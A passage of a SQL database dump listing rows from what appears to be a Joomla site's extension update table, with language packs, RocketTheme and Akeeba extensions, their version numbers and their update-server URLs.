Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20999,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21000,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21001,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21002,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21003,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21004,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21005,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21006,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21007,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21008,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21009,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21010,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21011,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21012,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21013,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21014,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21015,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21016,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21017,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21018,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21019,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21020,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21021,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21022,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21023,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21024,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21025,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21026,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21027,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21028,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21029,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21030,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21031,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21032,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21033,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21034,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21035,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21036,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21037,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21038,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21039,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21040,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21041,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21042,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21043,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21044,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21045,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21046,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21047,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21048,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21049,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21050,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21051,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21052,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21053,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21054,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21055,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21056,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21057,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21058,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21059,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21060,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21061,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21062,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21063,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21064,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21065,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21066,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21067,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21068,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21069,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21070,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21071,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21072,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21073,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21074,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21075,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21077,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21078,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21079,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21080,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21081,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21082,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21083,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21084,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21085,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21086,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21087,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21088,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21089,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21090,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21091,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21092,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21093,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21094,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21095,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21096,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21097,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21098,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21099,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21100,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21101,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21102,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21103,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21104,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21105,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21106,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21107,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21108,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21109,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21110,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21111,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21112,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21113,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21114,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21115,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21116,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21117,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21118,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21119,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21120,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21121,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21122,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21123,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21124,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21125,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21126,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21127,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21128,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21129,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21130,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21131,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21132,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21133,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21134,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21135,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21136,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21137,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21138,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21139,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21140,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21141,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21142,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21143,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21144,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21145,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21146,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21147,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21148,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21149,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21150,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21151,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21152,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21153,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21154,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21155,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21156,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21157,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21158,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21159,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21160,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21161,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21162,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21163,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21164,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21165,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21166,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21167,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21168,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21169,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21170,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21171,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21172,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21173,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21174,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21175,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21176,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21177,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21178,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21179,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21180,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21181,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21182,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21183,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21184,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21185,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21186,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21187,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21188,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21189,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21190,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21191,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21192,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21193,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21194,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21195,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21196,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21197,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21198,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21199,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21200,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21201,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21202,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21203,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21204,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21205,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21206,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21207,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21208,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21209,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21210,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21211,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21212,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21213,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21214,3,0,'English 